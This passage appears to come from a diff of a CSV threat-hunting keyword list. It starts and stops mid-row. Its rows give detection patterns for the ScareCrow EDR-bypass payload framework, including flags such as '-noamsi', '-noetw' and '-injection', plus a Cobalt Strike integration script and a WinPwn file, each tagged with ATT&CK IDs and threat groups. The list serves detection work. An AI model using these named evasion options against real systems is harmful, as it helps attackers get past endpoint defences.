Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -encryptionmode *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -Evasion*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -Exec*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -injection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -Loader * ","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -noamsi*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -noetw*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -obfu*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow*_darwin_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow*_windows_amd64.exe*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow*KnownDLL*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow*ProcessInjection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow*windows_amd64.exe*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","437","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" -"*ScareCrow.go*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow/Cryptor*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow/limelighter*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow/Loader*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow/Utils*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow_*_darwin_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow_*_linux_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow_*amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow_checksums.txt*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*SCCM_DLLSiteloading.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*ScareCrow *-loader *","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -encryptionmode *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -Evasion*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -Exec*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - 